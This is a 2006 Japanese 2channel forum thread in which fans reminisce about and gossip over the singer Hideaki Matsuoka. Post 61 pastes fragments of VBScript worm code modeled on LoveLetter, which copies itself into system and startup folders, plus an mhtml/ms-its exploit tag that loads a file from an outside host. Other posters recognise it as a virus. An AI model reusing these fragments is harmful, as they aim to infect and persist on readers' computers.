2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

松岡英明その1♪

1 :NO MUSIC NO NAME:2006/04/07(金) 17:34:17 ID:dk9uCEkZ
松BOWこと松岡英明君のスレです。kiss kiss

2 :NO MUSIC NO NAME:2006/04/07(金) 17:37:12 ID:RdnIsY3S
はげ

3 :NO MUSIC NO NAME:2006/04/08(土) 18:02:47 ID:173lNhWB
その1って、次スレあるのか。

4 :NO MUSIC NO NAME:2006/04/08(土) 18:40:36 ID:IpntT8A4
KISSKISS 可愛い曲ばかりでいまだに大好きだ!仲良しの岡村ちゃんの方が人気あるのね!

5 :NO MUSIC NO NAME:2006/04/10(月) 01:18:18 ID:xqEA0WtR
誰?

6 :NO MUSIC NO NAME:2006/04/10(月) 07:29:17 ID:eK1cXPiY
松岡くん、懐かしい
昔 パチパチとかに載ってたな。以心伝心が好きでよく聴いてた。

7 :NO MUSIC NO NAME:2006/04/10(月) 19:16:15 ID:yaW+BrDz
まっちっあっわっせーーーーえぇ

8 :NO MUSIC NO NAME:2006/04/10(月) 21:50:33 ID:Ef6ywBPr
Hey! Girl study After school!
Hey! Girl start it!

9 :NO MUSIC NO NAME:2006/04/11(火) 11:56:37 ID:s6L2Yj6y
最近ondineをヘビーローテで聞いてます。
で、アルバムの歌詞カードの表紙を開くと




僕に夢を与えてくれた三人の天才達にこのアルバムを捧げます
            童夢、夢路、緑夢




目の錯覚かと思いましたけど、
なんと今年2月に2ちゃんねる、いや日本中を悪い方向で騒がせたあの人達の名前が・・・・
ちなみに96年発売のアルバムです。


10 :NO MUSIC NO NAME:2006/04/11(火) 22:00:59 ID:fyGEOwTe
中田氏童夢

11 :NO MUSIC NO NAME:2006/04/12(水) 11:05:34 ID:XkFE/Rg1
>>9
彼は人を見る目がないのかな。昔付き合ってたモデルとか…。


12 :NO MUSIC NO NAME:2006/04/12(水) 18:53:59 ID:x4692h1M
彼はキスキスのアルバムが最高傑作だと思う!可愛い女の子に無条件でめがない。♪PleasePleaseキスライクあストロベリーキス☆

13 :NO MUSIC NO NAME:2006/04/12(水) 19:24:31 ID:4AjEkC0c
文化祭で演奏するためKISSKISSの歌詞を必死こいて丸暗記した工房時代。
あれから15年経った今でも見ないで歌えます(`・ω・´)

14 :NO MUSIC NO NAME:2006/04/12(水) 20:08:10 ID:x4692h1M
>>13 私も歌えるかも。可愛い松岡英明君だったのに今はどうしてるのやら……。

15 :NO MUSIC NO NAME:2006/04/13(木) 13:52:09 ID:N4kFBfox
>14
オフィ
ttp://www.hideaki-matsuoka.com/

最近は東京オンリーのミュージカルとか出てるね。
CDはインディーズでしか出してないかなあ…
相変わらず不惑の歳近くとは思えないほど可愛いよw

16 :NO MUSIC NO NAME:2006/04/14(金) 10:56:16 ID:GHWbziuU
>>11
そのモデルの写真Blog ttp://blog.goo.ne.jp/mizuhohime2005/
年の割にはキレイで、子供イケメンになりそうで、いい家に住んでるっぽい。
そんな彼女に振られた彼の10年後 ttp://blog.livedoor.jp/code87502/

やっぱ歌手はバックグラウンドが無くなった後が辛いね(´・ω・`)
あんなにショックだった報道の相手なのに色んな意味で
松岡と結婚とかならなくて本当に良かったねとか思ってしまう自分が悲シス

17 :NO MUSIC NO NAME:2006/04/16(日) 09:46:40 ID:ypTW+0lD
ガンガレ

18 :NO MUSIC NO NAME:2006/04/16(日) 22:35:34 ID:ifbka6ls
さっき、RECOfanで "Divine Design" が\105で売っていたので思わず買ってしまった。

19 :NO MUSIC NO NAME:2006/04/16(日) 23:05:08 ID:cRnkcr38
>>18
105円・・・orz

ベースラインとかマジかっこいいでな、ちゃんとヘッドフォンで聞いてあげてくれ。

20 :NO MUSIC NO NAME:2006/04/21(金) 20:49:17 ID:wTaPSYhJ
松岡英明君は童顔だね☆人柄のよさがプログにでてる☆

21 :NO MUSIC NO NAME:2006/04/23(日) 04:40:06 ID:x0eWJRqL
>>16
松岡英明にだって勝ってるとこはあるよ!!
2chにスレがあるとことかっ・・・!!
>>18
97年頃に近所の中古屋で180円のWe Love Youを見つけた時は悲しかったな...新品同様だったよ...

22 :NO MUSIC NO NAME:2006/04/23(日) 10:44:38 ID:0nbEh+/1
15年前に2chがあったら松岡スレ乱立してただろうし書きこみも多かっただろうな・・・
生まれた時代が悪かった

23 :NO MUSIC NO NAME:2006/04/23(日) 22:07:56 ID:OH8ag8px
松岡英明君の写真だけど無添されて叩かれていたよ。キモいとかおじさんのくせに少年みたいな髪形はやめろとか。可愛いと思うのになー。かわいそう

24 :NO MUSIC NO NAME:2006/04/23(日) 23:20:45 ID:x0eWJRqL
>>23
あれはキモかわいいの域に達してると思う
高見沢、京本、アンガールズ・・・
見方によっちゃカワイイけどやっぱキモイって!の域

25 :24:2006/04/23(日) 23:41:06 ID:x0eWJRqL
↑の後、堂本兄弟みてたら・・・
浅倉大介が一番近いかもと思ってしまった・・・
汚くてたるんだ肌に年がいもない無理のある髪型

26 :NO MUSIC NO NAME:2006/04/24(月) 14:36:49 ID:yIt+PPCZ
つ 鏡

27 :NO MUSIC NO NAME:2006/04/24(月) 14:46:16 ID:w/vulsLD
松BOWはブサイクになったなー(T_T)

28 :NO MUSIC NO NAME:2006/04/25(火) 12:54:05 ID:r2nN/mer
彼の歌詞は昔からワンパターンだよね

29 :NO MUSIC NO NAME:2006/04/25(火) 13:39:05 ID:U2i+pGnb
今、何してるん?
よくキャッチミーを歌いまくってた。

30 :NO MUSIC NO NAME:2006/04/25(火) 16:00:06 ID:xDaBJaII
つーか、スレ立てるなら伝説板か懐かし板だろ。

31 :NO MUSIC NO NAME:2006/04/25(火) 21:25:41 ID:P0DsNsjl
レジェンドとかいう編集盤だしてるくらいだしな。

32 :NO MUSIC NO NAME:2006/04/26(水) 12:10:26 ID:kxnOz2mN
今アルバムlightandcoluar聴いてます。
昔から気になってたんだけど松岡は英語の曲も多いけど彼は実生活でも英語ペラペラなのか?

33 :NO MUSIC NO NAME:2006/04/26(水) 12:11:36 ID:kxnOz2mN
colourだった。・・・・

34 :NO MUSIC NO NAME:2006/04/26(水) 16:48:22 ID:9pDBYYnX
松岡英明君は撮影でロンドンに行ってるし少し英語が話せるかも☆

35 :NO MUSIC NO NAME:2006/04/26(水) 18:07:50 ID:i614jiWA
帰国子女か何かじゃないの?

36 :NO MUSIC NO NAME:2006/04/26(水) 20:10:33 ID:9pDBYYnX
>>35横浜っこだよ

37 :NO MUSIC NO NAME:2006/04/26(水) 20:26:44 ID:JT2PidBm
洋楽聴きまくってたから自然に英語が身についたのでしょう

38 :NO MUSIC NO NAME:2006/04/27(木) 23:54:56 ID:YxT8hLbX
Divine Design・・・私の中の最高傑作
一番好きでしたw

39 :NO MUSIC NO NAME:2006/04/28(金) 11:50:05 ID:icrCNAhG
>>32 松岡は英語話せがすごくぺらぺらと思うよ。
外人友達が沢山あるんでしょう?

40 :NO MUSIC NO NAME:2006/04/29(土) 04:06:06 ID:wLHrNhCI
>>39は日本語もつたない件について。

41 :NO MUSIC NO NAME:2006/04/29(土) 13:00:05 ID:j54qgR/C
私はキスキスの曲全部好きだな!カバー曲もあるけどカッコイイ!彼はもう少し太ったほうがいいな。

42 :32:2006/04/29(土) 22:23:00 ID:aktFB+aw
なんだ。松岡って純日本育ちなのか。
デュランデュランを現地(デュランデュランがどこの国の人かは知らないけどイギリスとか)で
聴いて育って、すごい感性を身につけて日本にやってきて
センセーショナルな歌手デビューをしたとずっと思ってたんだけど違うのね。
まあそれ自体どこでも見たことがない俺の彼の脳内プロフィール(イメージ)なんだけど。

そりゃ確かに、本物の洋楽の人たちとは発音が違い
どちらかといえばやはり他の日本人歌手が歌う英語に似ているのは薄々気づいていたけど。

まあ約15年くらい聴いてるし今さらそれで印象が変わることはないと断言しておく。

43 :NO MUSIC NO NAME:2006/05/03(水) 13:43:18 ID:Jicyb86a
>>42 15年彼の曲をきいてきてどうですか?Liveとかどんな感じですか?

44 :NO MUSIC NO NAME:2006/05/07(日) 20:50:31 ID:sat74J+B
>>32,39
本人曰く「僕、カタコトでしか英語は話せないよ」だそうな。
昔、音楽雑誌のインタビューに書いてあった。
英語の歌詞でデビューしたし、デビュー後の2〜3年くらいは本人の作詞は
英語ばかりだったけど。
歌詞見るとたまに文法間違ってるし。
本人も後に気づいたらしいが。w

45 :NO MUSIC NO NAME:2006/05/08(月) 15:48:10 ID:EG+kJRlI
以心伝心♪言葉より速く イシンデンシン♪♪

46 :NO MUSIC NO NAME:2006/05/08(月) 17:36:49 ID:TAHx0J5p
僕らはいつも以心伝心〜

47 :NO MUSIC NO NAME:2006/05/08(月) 18:29:57 ID:EG+kJRlI
それオレンジレンジだよ♪僕らはいつも以心伝心 離れてたって♪最近アルバム聴いてないや

48 :NO MUSIC NO NAME:2006/05/08(月) 20:06:13 ID:0bE6vr7H
僕らはいつも心停止〜♪

49 :NO MUSIC NO NAME:2006/05/09(火) 01:17:52 ID:P9GXvYCG
死んでんじゃないかよ!

50 :NO MUSIC NO NAME:2006/05/10(水) 01:20:31 ID:kM2+1n2Z
松岡英明ブサイク

51 :NO MUSIC NO NAME:2006/05/11(木) 19:31:41 ID:ylV5mQPM
初めの頃はかわいかったのに今はただのブサイクなおっさんだわ

52 :NO MUSIC NO NAME:2006/05/11(木) 20:11:19 ID:iVipJIoT
その通り。そして彼方も相当な歳を喰った。

53 :NO MUSIC NO NAME:2006/05/18(木) 00:21:51 ID:1iHhdhbP
♪会いたいと思うのは簡単でも会いたいと思わせるのは難しい事♪

54 :NO MUSIC NO NAME:2006/05/19(金) 23:29:50 ID:kEHRKc0M
デジャヴの音源なんてもう手に入らないよな

55 :NO MUSIC NO NAME:2006/05/24(水) 00:34:47 ID:fO7cL7qv
>>54
中古なら簡単さ
新品なら最近出たCLAMPのBOXがあるけど
松岡2曲狙いでは高すぎる...

♪十字架なんて頼れない 君を守りたいのさ〜デジャブデジャブデジャブデジャデジャッブ♪

56 :NO MUSIC NO NAME:2006/06/01(木) 03:17:54 ID:SrzwbUsC
松岡くんのスレがあるなんて!!感動!!
ところで今、12chで松岡くんの特集やってましたよ。
彼ももう20周年なんだね、元気に活動してくれている事に感謝!
ライブ行ってみたいなぁ。

57 :NO MUSIC NO NAME:2006/06/04(日) 00:20:07 ID:czYH+hKc
>>56
12chというと関西ではNHK教育になるんだけどそれは無いか

58 :NO MUSIC NO NAME:2006/06/04(日) 00:27:07 ID:ZfTjlJc3
7月にTBSチャンネルで昔のライブ放送されるね

59 :NO MUSIC NO NAME:2006/06/16(金) 06:30:05 ID:EV4Y+D/L
暑くなると聴きたくなる「真夏の誘惑」

シェリーと夏と僕とか夏の終わりとかに聴くと堪らない
あのアルバム自体なんともいえない季節感というか空気感があってイイ

60 :NO MUSIC NO NAME:2006/06/21(水) 20:22:33 ID:4lTgcEpV
最初で最後のBEEスター。よくビデオコンサート行ったな。

61 :NO MUSIC NO NAME:2006/07/02(日) 20:37:41 ID:BqAPxOMA
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

62 :NO MUSIC NO NAME:2006/07/12(水) 16:18:40 ID:05ZFI3/t
何?歌詞?↑↑

63 :NO MUSIC NO NAME:2006/07/13(木) 22:10:52 ID:1fheWG0x
>>62
TV Noizの曲を解析するとこうなる。

64 :NO MUSIC NO NAME:2006/07/14(金) 18:42:47 ID:5A+YnDiJ
ウイルスじゃねーか!!!!!!!!
貼ったやつ失業しろ

65 :NO MUSIC NO NAME:2006/07/20(木) 03:32:49 ID:Isv4qwWy
今、テレビ大阪に出てる

66 :NO MUSIC NO NAME:2006/07/22(土) 22:30:50 ID:1KAOmv7I
こっちはマンセー板でつか?
インディーズ板にスレ立てれ


67 :NO MUSIC NO NAME:2006/07/28(金) 01:36:09 ID:qbtKqY3L
ブログで発表
末が女優と結婚




という夢を見た 何年後に現実となるか?
その前に森生きの若手メンバー喰ってそうだなww

68 :NO MUSIC NO NAME:2006/07/30(日) 00:44:41 ID:OSWXTV7N
今、MXテレビで松岡、ハケーン!
雰囲気は昔と変わってないなー。

69 :NO MUSIC NO NAME:2006/08/01(火) 07:18:34 ID:8hXN8HFQ
松が結婚したって、随分前に聞いたんだけど、本当でつか?

70 :NO MUSIC NO NAME:2006/08/03(木) 02:38:40 ID:44BIMwTV
今はケコーンしてないみたい
末がHPで言ってたよ
×1という噂はどうなんだ?

71 :NO MUSIC NO NAME:2006/08/06(日) 02:26:27 ID:jhpccJW9
じゃ、結婚を考えたけど、やめたのかな・・よく、ある話。

72 :NO MUSIC NO NAME:2006/08/06(日) 02:32:02 ID:jhpccJW9
というかさ、なんだっていいけど、もはや庶民人なんだから、ファンと距離もつくせ、やめてほしい。

73 :NO MUSIC NO NAME:2006/08/07(月) 01:22:17 ID:dbN+8VQl
>ファンと距離もつ
どんな所が?

74 :NO MUSIC NO NAME:2006/08/07(月) 04:21:41 ID:mFI6TY+O
見てればわかるじゃん。
10年前の松だったら、おそわれたかもしれないけど、今はお金もらっても、松のことはおそわない。

75 :NO MUSIC NO NAME:2006/08/09(水) 00:17:44 ID:6lU++vLB
去年会ってた時、人の多いとこは人目が気になるって言ってたよ!
てか末と認識する人少ないとおもふ。。。かなしいかな人生

76 :NO MUSIC NO NAME:2006/08/09(水) 01:07:12 ID:Rswp9cJA
×1なん?
以前、末が青結婚ゆうてたの思い出したわ

77 :NO MUSIC NO NAME:2006/08/09(水) 10:34:36 ID:VNQDAPHl
私は人目が多くても手繋いで歩いてるよ。

78 :NO MUSIC NO NAME:2006/08/09(水) 23:08:28 ID:p5c1jbrp
きっと77さんはかわゆい子なんだろね!

79 :NO MUSIC NO NAME:2006/08/10(木) 00:55:18 ID:Kgz9sXEX
そう、末は手繋いで歩くのが好きだよね
乗り物の中でも黙って手繋いでくる

ていうか、きも

80 :NO MUSIC NO NAME:2006/08/10(木) 01:36:53 ID:e5N377Cw
15年前横浜のシャルに普通に歩いてたこの人、当時TVKかなんかでこの人見て芸能人だと分かってたけど、一緒にいた友達は知らなかったw背の低い小柄な兄ちゃんでした

81 :70歳以下のお前ら様へ。:2006/08/10(木) 22:46:18 ID:GMIugxd2
俺、厨房時代は英語の授業が大嫌いだった。
そんな時、工房の姉からKISS KISSのダビングテープを聴かされ曲が好きになり、
英詩訳を見ながら辞書引き単語勉強、学校でも英語を必死に勉強してた。
松岡英明がいなかったら、英語の成績はずっと酷いものだったと今思う。
その後、LIGHT AND COLOURが発売され、姉から「もうファンやめる」とCD渡された。
どうもSEXという曲がお気に召さなかった様だ。まぁ、自分も曲聴いた当時「マジっすか!」と
思ったが、VIRGINSの続編だなと解釈して、その後のアルバムは自分が全部買ってました。
VISIONS OF BOYS、DIVINE DESIGN、以心伝心、KISS KISS、LIGHT AND COLOUR、
シェリーと夏と僕、WE LOVE YOU、18、ONDINE、EYES OF THE EINSTEIN ZOO、THE LEGEND、FUTURE TOY。
8cmシングル 恋はあせらず、デジャ・ヴ、コズミックパズルは未だ手放せません。
カラオケ行っても曲が無かったのが悲しかった。KISS KISS、STARだけ歌った記憶が。

以上、チラシが無いのでココに書きました。長文スマン。

82 :NO MUSIC NO NAME:2006/08/11(金) 01:14:33 ID:/q7HJqfG
くどき文句もやり方も同じなんだろな。
末よ歌を愛せ!上っ面だから間違えるんだよ!

83 :NO MUSIC NO NAME:2006/08/12(土) 02:19:58 ID:bThIzR/A
>>18

84 :NO MUSIC NO NAME:2006/08/12(土) 23:10:06 ID:MWhpD3wR
松岡なつかしい!
CATCHとだいすきとRESISTANCEをよく聞いていましたよ。

85 :NO MUSIC NO NAME:2006/08/14(月) 01:34:19 ID:tM5tcD7P
森生き終わったね

86 :NO MUSIC NO NAME:2006/08/14(月) 10:44:03 ID:/CpWgvi8
てか松岡がもう終わってるよw

87 :NO MUSIC NO NAME:2006/08/21(月) 23:06:38 ID:YxhVoUkS
TBSチャンネルでVISION OF BOYSって曲を歌っているがトムキャットばりのサングラスでわらっちゃう

88 :NO MUSIC NO NAME:2006/08/27(日) 00:45:57 ID:4M+YlXaN
曲は嫌いじゃなかったが人がね・・・

89 :NO MUSIC NO NAME:2006/08/27(日) 04:17:06 ID:tC5KJleM
曲は嫌いじゃないが、人格がね…w

90 :NO MUSIC NO NAME:2006/08/30(水) 06:09:52 ID:sUskaO2E
なんか、最近の松の文章が説得力がない。月に一回くらい、いいこと言うけど・・

あと、自分で自分の携帯からとった写真を日記にのせるのはやめてほしい。


91 :NO MUSIC NO NAME:2006/08/30(水) 11:49:56 ID:h1rY3c78
ナンダカンダ言っても結局見てるじゃん!!


92 :NO MUSIC NO NAME:2006/08/31(木) 21:23:50 ID:oJgg8apO
こわいものみたさで、みているの。

末が青結婚ゆうてたの思い出したわ 。 これは、結婚しました。という意味?



93 :NO MUSIC NO NAME:2006/08/31(木) 22:28:49 ID:Ukq5fD9z
>92
どこで言ってたの?

94 :NO MUSIC NO NAME:2006/09/01(金) 10:21:45 ID:80im1rMc
末の結婚については誰もが知りたいことだが末が結婚してようと、してまいがファソじゃない人達には関係ないこと
知りたいなら本人に直接聞きな
末だって一人の人間、恋愛するのは当然!ファソなら見守るべき
ジェラシー感じるのはあなたが末のこと嫌いじゃないからなんでしょ?素直になりなよ


95 :NO MUSIC NO NAME:2006/09/01(金) 11:46:49 ID:k0YR7jIz
w-inds.の新曲プロモをさっき見たが、
ボーカルが(末+ジャニーズ+α)÷3みたいになってたんで
末某を思い出して来てみました…ノシ
なーんかあれは変だった…。顔が…歌が…

96 :NO MUSIC NO NAME:2006/09/01(金) 12:41:53 ID:4FiGtj7G
>94
あなたの反応につい笑いが出てしまったw
まだ末をかばう妖精いたんだねw

97 :NO MUSIC NO NAME:2006/09/01(金) 13:37:44 ID:80im1rMc
妖精の言葉がわかるなんて!!同類♪同類♪w

98 :NO MUSIC NO NAME:2006/09/02(土) 08:40:37 ID:J4F1NX1x
>>94
私もワロタ
末は現在結婚してない(末本人がHPで発表)
ここの住人はファンではない
よって見守れない
2chで自分の意見押し付けるのはナンセンス

94は釣りだった?釣られてみましたw

99 :NO MUSIC NO NAME:2006/09/02(土) 20:01:08 ID:U+l/LSzo
昔は、結婚していた時期もあったの?

いい家庭のおぼっちゃんなのに・・幼年期、よっぽどかわいくて、かわいがられたのかなぁ・・
案外と、60歳くらいは、品のいいおじいさんだったりして・・今が一番、大変かもね。

100 :NO MUSIC NO NAME:2006/09/02(土) 21:37:05 ID:siYIpM9/
ていうか、なんでここに末の板なんて作ったんだ?
既に長く続いてる板あるのにさー。

101 :NO MUSIC NO NAME:2006/09/03(日) 00:18:04 ID:BAd0Roat
>97ってアフォ?w

102 :NO MUSIC NO NAME:2006/09/03(日) 03:53:09 ID:fER5vZYD
>101ってアフォ!?w

103 :NO MUSIC NO NAME:2006/09/03(日) 08:25:07 ID:BAd0Roat
妖精のヲバ、必死だなw
そんなに必死にかばっても
末に相手される訳でもないのに…カワイソス

104 :NO MUSIC NO NAME:2006/09/03(日) 12:21:01 ID:fER5vZYD
>103より若いよ♪
必死じゃなく此処の住人からかうのが楽しいだけ
ニャハ♪

105 :NO MUSIC NO NAME:2006/09/03(日) 13:47:17 ID:BAd0Roat
なんだ、ただの馬鹿女か…

106 :NO MUSIC NO NAME:2006/09/03(日) 16:23:08 ID:fER5vZYD
>105は自分のこと、天才と思ってるのか?w


107 :NO MUSIC NO NAME:2006/09/03(日) 19:59:03 ID:BAd0Roat
ホントーーーに
すくいようがない馬鹿なんだねぇwww

108 :NO MUSIC NO NAME:2006/09/03(日) 21:03:23 ID:fER5vZYD
お互い様♪♪♪

109 :NO MUSIC NO NAME:2006/09/03(日) 21:14:08 ID:BAd0Roat
一緒にしないでほしいわw

110 :NO MUSIC NO NAME:2006/09/03(日) 22:45:25 ID:fER5vZYD
残念♪
此処で末の話をしてる事自体一緒♪ワカラナイノ?ダサイ!!

111 :NO MUSIC NO NAME:2006/09/06(水) 01:26:13 ID:LQ3go1Tx
低脳スレになってきたな
末に話題性がないから仕方がない

112 :NO MUSIC NO NAME:2006/09/07(木) 18:48:26 ID:FVN8YdS5
>110
『ダサイ』って久しぶりに聞いた。ワラエルw

113 :NO MUSIC NO NAME:2006/09/07(木) 23:29:04 ID:KobwwHWQ
他スレで末の彼女は
眼鏡メイドとの噂が
嘘でも本当でもいいが
どんな顔の女?
姫>名倉マリナさん>元同棲彼女
どこの位置?

114 :NO MUSIC NO NAME:2006/09/08(金) 07:58:40 ID:jdwP2/fU
>113

いや眼鏡はありえないな
もう一人のメイドが末好みに見えるけど?

115 :NO MUSIC NO NAME:2006/09/11(月) 02:52:54 ID:uKJw1mmS
わぁ〜
Club@visionのチャットオチしてたら末と名乗るものが!
本物?オチしてきまふ

116 :NO MUSIC NO NAME:2006/09/11(月) 21:13:41 ID:3eo70Vi3
>114

いやん。眼鏡のメイドが末の彼女〜〜〜〜〜〜

117 :NO MUSIC NO NAME:2006/09/12(火) 01:12:54 ID:N2ojfNmr
末の女、誰でもいいが
彼女は恥だな
いいのか?末で?
もっといい男は沢山いる

118 :NO MUSIC NO NAME:2006/09/12(火) 22:34:41 ID:TmjPmqQx
芸能人と付き合えるなら、どんなんでも自慢になるのかなぁ〜w

119 :NO MUSIC NO NAME:2006/09/12(火) 23:59:21 ID:cWUEVeF7
はたして末は芸能人といえるか?
芸能人であっても末の人格ではなぁ〜

120 :NO MUSIC NO NAME:2006/09/13(水) 06:30:49 ID:GN3mOoW1
>119
そうそう。末でも自慢になっちゃうのが笑えるw
逆にここまで評判悪いと、一般ピーポーでも
恥ずかしくて付き合えないものだがw

121 :NO MUSIC NO NAME:2006/09/14(木) 02:38:09 ID:DqBb2HuL
少し前にヤフオクで末の雑誌の切り抜きが出てた
あれ、魔○っ子め○たんが出品したんだね

ヤフオクで末の品はいつも沢山出てるものなの?
最近、多くなった?

122 :NO MUSIC NO NAME:2006/09/19(火) 22:06:26 ID:pFPC2qBR
無邪気にそっと近寄っても鳥が逃げるのはなぜ?

123 :NO MUSIC NO NAME:2006/09/20(水) 03:14:20 ID:yUCbrdLt
でも捕まえて喰っちゃうんだろw

124 :NO MUSIC NO NAME:2006/09/20(水) 21:34:07 ID:yK6d2Ftc
>>122
そう彼女に訊いたらどう答えるだろう?

125 :NO MUSIC NO NAME:2006/09/21(木) 01:56:47 ID:Z/JH0XZO
末を見ても、どきどきしなくなった。なぜ?



126 :NO MUSIC NO NAME:2006/09/21(木) 02:32:04 ID:azoC36yC
>125
オヤジだから!

127 :NO MUSIC NO NAME:2006/09/21(木) 18:22:16 ID:xlCdIEMZ
♪夜が明けるまでに 虹を渡ろう、と 僕を誘うのは何故?


128 :NO MUSIC NO NAME:2006/09/21(木) 21:16:59 ID:7JTQ7xG+
>>122
過去の悪行がみなに知れ渡ってきたから

129 :NO MUSIC NO NAME:2006/09/21(木) 22:48:30 ID:azoC36yC
過去なんだっけ?現在進行形なのでは?w

130 :NO MUSIC NO NAME:2006/09/22(金) 03:02:31 ID:cbqfYSFV
末帽ナツカシス

この人、ヲタ食いしてんの?最悪w

131 :NO MUSIC NO NAME:2006/09/22(金) 14:21:41 ID:hxC116xP
>129
進行形でつたwファン喰い
噂板参照

132 :NO MUSIC NO NAME:2006/09/22(金) 23:37:34 ID:hiFf4MTe
゙きっと、誰からも愛されるきみの 心配なんかは少しだけでいいね?

133 :NO MUSIC NO NAME:2006/09/24(日) 21:56:26 ID:ToD8UHCs
♪教えて神様!暗闇の奥に 何が息をひそめてるのか?

134 :sage:2006/09/27(水) 21:17:24 ID:2Fs8Sk3q
Rainy tuesday
That was yesterday

135 :NO MUSIC NO NAME:2006/09/28(木) 18:22:41 ID:Q39TnioX
♪2つ目の角を 右へ曲がると

136 :NO MUSIC NO NAME:2006/09/28(木) 19:30:16 ID:rZ3TUS5c
以心伝心

137 :NO MUSIC NO NAME:2006/09/28(木) 22:03:43 ID:tChDDB6x
花びらのように散りゆく中でw

138 :NO MUSIC NO NAME:2006/09/29(金) 17:06:02 ID:/FbYm/P8
どうして 鳥は飛べる きみのこたえを聞きたい

139 :NO MUSIC NO NAME:2006/09/30(土) 15:56:04 ID:pFY0KqqY
歌詞書いて何の意味があるの?

140 :NO MUSIC NO NAME:2006/09/30(土) 17:31:21 ID:nRQaRWWI
愛犬・ルパンは元気かな?

141 :NO MUSIC NO NAME:2006/09/30(土) 22:57:21 ID:pFY0KqqY
もういないんじゃない?

142 :NO MUSIC NO NAME:2006/09/30(土) 23:30:37 ID:Y9VIfLmF
公式調べてみたら2004年11月初頭にお亡くなりになってる模様>愛犬

143 :NO MUSIC NO NAME:2006/10/01(日) 18:46:33 ID:RDxByXvL
この前、ブック○フで、kisskiss、以心伝心、Devine Design などなど
計5枚まとめ買いしてきた。
なつかしいよーー。
今聞いてもけっこういいと思いました。


144 :NO MUSIC NO NAME:2006/10/01(日) 23:06:35 ID:GYSlA0Kg
2年位前のエピック25周年ライブに出てきた彼は昔と変わらなく見えた。
「以心伝心」一曲だけでしたが当時が蘇ってきて泣けた。

145 :NO MUSIC NO NAME:2006/10/02(月) 18:35:57 ID:kbiw7wTJ
kiss kissはたしかオリコンで1位を取ったと思ったが…

146 :NO MUSIC NO NAME:2006/10/02(月) 19:56:14 ID:y/Fu+sqP
うっそ〜ん!?

147 :NO MUSIC NO NAME:2006/10/02(月) 21:57:51 ID:1C4mKx47
釣り。
末が1位取れるわけないだろ。

148 :NO MUSIC NO NAME:2006/10/02(月) 23:25:07 ID:y/Fu+sqP
だよねー。

149 :NO MUSIC NO NAME:2006/10/03(火) 02:26:03 ID:tVYnU3bQ
高橋克典の方が売れちゃったね

150 :NO MUSIC NO NAME:2006/10/04(水) 00:06:57 ID:oZqbCDY0
だって高橋カッコイイもん。そりゃー売れるでしょー。

151 :NO MUSIC NO NAME:2006/10/04(水) 02:03:00 ID:/fmTa8tU
J・P・U

152 :NO MUSIC NO NAME:2006/10/06(金) 15:29:19 ID:7UtLGMnY
意味わからん

153 :NO MUSIC NO NAME:2006/10/06(金) 21:03:30 ID:yRnbPkWL
ジャスト ポップ アップ

154 :NO MUSIC NO NAME:2006/10/06(金) 21:55:32 ID:7UtLGMnY
ふ、ふる〜い!w

155 :NO MUSIC NO NAME:2006/10/06(金) 22:33:59 ID:kXJXTyY6
ロッテリア、ポップ・オーン・ポーップ!

156 :NO MUSIC NO NAME:2006/10/06(金) 23:01:36 ID:7UtLGMnY
確かNack5だよねw

157 :NO MUSIC NO NAME:2006/10/08(日) 13:16:53 ID:iWv+CYV8
>>156は釣りか?
JPU:NHK
POP:TBS
MRC:795

158 :NO MUSIC NO NAME:2006/10/08(日) 15:52:11 ID:1zgKqoJS
MRCってなんだっけ?

159 :NO MUSIC NO NAME:2006/10/08(日) 22:14:50 ID:iWv+CYV8
MIDNIGHT ROCK CITY

160 :NO MUSIC NO NAME:2006/10/09(月) 02:01:29 ID:45MGTYES
もう10年以上前の話でしょー?よく覚えてるねーw

161 :NO MUSIC NO NAME:2006/10/24(火) 20:52:51 ID:ERMlnS+1
あらためましてこんばんわ ボクが松岡山チキチキニニャ!ヒデアキでーす
そんなわけでねーどんなわけなんでしょうねーよくわかりませんがーヌフフ

とか言ってるこいつのラジオを聴いてた昔がなつかしい

162 :NO MUSIC NO NAME:2006/10/25(水) 02:16:43 ID:spcyppX5
>161
書き込むなよ!こんなスレなくなってしまえ!

163 :NO MUSIC NO NAME:2006/10/25(水) 21:19:07 ID:yqEuJFB1
>>162
城ミチル乙

164 :NO MUSIC NO NAME:2006/10/25(水) 21:52:12 ID:+qbq1EQ/
>>162
オマエモナー

165 :NO MUSIC NO NAME:2006/10/28(土) 11:31:41 ID:Tu3B78KQ
てゆーか、ここにスレ作るなよ!

166 :NO MUSIC NO NAME:2006/10/28(土) 20:14:36 ID:TC8ePauJ
”wonder land”って曲だったと思うんだけど、小さい子供がいっぱい
出てくるプロモーションビデオって販売してる?

167 :NO MUSIC NO NAME:2006/11/02(木) 00:09:05 ID:TDOpMWIo
20周年!

168 :NO MUSIC NO NAME:2006/11/03(金) 22:21:25 ID:dWMk6W+1
ライブ行ってきたよ。

169 :NO MUSIC NO NAME:2006/11/03(金) 23:07:01 ID:dnF3/eBt
詳細キボンヌ

170 :NO MUSIC NO NAME:2006/11/03(金) 23:07:03 ID:8hxKD6Uz
おれも行ってきた。15年以上振りだった。
それでもアレだね、曲って覚えてるもんだね。
頑張れよ、と思ったけど、多分もう観に行かんだろうなぁ。
あまりにも風貌が変わってないので、人の生き血をすすってるんだろうと思った。

171 :NO MUSIC NO NAME:2006/11/21(火) 22:17:01 ID:umxkXvh7
ローソンのCMソング

172 :NO MUSIC NO NAME:2006/11/22(水) 23:03:32 ID:sfOPuzZJ
でも売れない

173 :NO MUSIC NO NAME:2006/11/23(木) 00:38:25 ID:crzUmgYt


174 :NO MUSIC NO NAME:2006/11/23(木) 02:09:37 ID:zy3Sjhu3
この季節になるとアイワナノウーがなつかしくなる

